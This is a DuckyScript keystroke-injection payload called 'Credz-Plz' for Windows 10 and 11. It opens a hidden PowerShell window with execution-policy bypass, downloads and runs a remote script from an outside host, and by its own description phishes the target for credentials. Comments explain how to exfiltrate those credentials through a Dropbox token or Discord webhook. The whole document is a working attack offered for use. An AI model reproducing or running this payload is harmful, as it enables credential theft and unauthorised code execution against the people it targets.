REM     Title: Credz-Plz

REM     Author: I am Jakoby

REM     Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a  Discord webhook.

REM     See README.md file for more details.

REM     Target: Windows 10, 11

GUI r
DELAY 500
STRING powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
ENTER

REM     Fill in either variable or both to set your exfil method.
REM     $db is the variable that holds your DropBox token.
REM     $dc is the variable that holds your Discord webhook.   
REM     If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.
